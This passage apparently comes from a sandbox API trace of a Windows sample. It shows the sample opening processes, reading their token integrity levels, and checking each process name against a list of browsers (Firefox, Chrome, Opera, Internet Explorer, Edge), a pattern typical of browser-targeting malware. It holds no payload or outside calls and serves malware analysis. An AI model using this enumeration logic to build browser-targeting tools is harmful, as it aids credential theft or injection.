(pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.188] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.189] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0233.189] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0233.189] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0233.189] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0233.189] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0233.189] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0233.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0233.189] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.189] GetLastError () returned 0x7a [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.189] CloseHandle (hObject=0xb8) returned 1 [0233.189] CloseHandle (hObject=0xb4) returned 1 [0233.189] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.189] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.189] GetLastError () returned 0x7a [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.189] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.189] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.189] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0233.189] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0233.189] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0233.189] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0233.189] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0233.189] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0233.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0233.189] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.189] GetLastError () returned 0x7a [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.189] CloseHandle (hObject=0xb8) returned 1 [0233.189] CloseHandle (hObject=0xb4) returned 1 [0233.189] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.189] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.189] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.190] GetLastError () returned 0x7a [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.190] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.190] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.190] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0233.190] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0233.190] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0233.190] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0233.190] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0233.190] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0233.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0233.190] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.190] GetLastError () returned 0x7a [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.190] CloseHandle (hObject=0xb8) returned 1 [0233.190] CloseHandle (hObject=0xb4) returned 1 [0233.190] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.190] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.190] GetLastError () returned 0x7a [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.190] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.190] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.190] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0233.190] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0233.190] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0233.190] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0233.190] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0233.190] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0233.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0233.190] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.190] GetLastError () returned 0x7a [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.190] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.190] CloseHandle (hObject=0xb8) returned 1 [0233.191] CloseHandle (hObject=0xb4) returned 1 [0233.191] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.191] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.191] GetLastError () returned 0x7a [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.191] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.191] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.191] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0233.191] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0233.191] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0233.191] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0233.191] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0233.191] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0233.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0233.191] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.191] GetLastError () returned 0x7a [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.191] CloseHandle (hObject=0xb8) returned 1 [0233.191] CloseHandle (hObject=0xb4) returned 1 [0233.191] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.191] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.191] GetLastError () returned 0x7a [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.191] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.191] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.191] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0233.191] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0233.191] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0233.191] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0233.191] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0233.191] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0233.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0233.191] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.191] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.191] GetLastError () returned 0x7a [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.192] CloseHandle (hObject=0xb8) returned 1 [0233.192] CloseHandle (hObject=0xb4) returned 1 [0233.192] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.192] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.192] GetLastError () returned 0x7a [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.192] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.192] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.192] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0233.192] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0233.192] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0233.192] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0233.192] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0233.192] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0233.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0233.192] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.192] GetLastError () returned 0x7a [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.192] CloseHandle (hObject=0xb8) returned 1 [0233.192] CloseHandle (hObject=0xb4) returned 1 [0233.192] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.192] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.192] GetLastError () returned 0x7a [0233.192] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.192] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.192] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.192] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.192] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.192] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.192] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.192] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.193] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0233.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0233.193] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.193] GetLastError () returned 0x7a [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.193] CloseHandle (hObject=0xb8) returned 1 [0233.193] CloseHandle (hObject=0xb4) returned 1 [0233.193] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.193] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.193] GetLastError () returned 0x7a [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0233.193] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0233.193] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0233.193] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0233.193] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0233.193] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0233.193] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0233.193] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0233.193] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0233.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0233.193] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0233.193] GetLastError () returned 0x7a [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0233.193] CloseHandle (hObject=0xb8) returned 1 [0233.193] CloseHandle (hObject=0xb4) returned 1 [0233.193] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.193] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0233.193] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0233.193] GetLastError () returned 0x7a [0233.193] 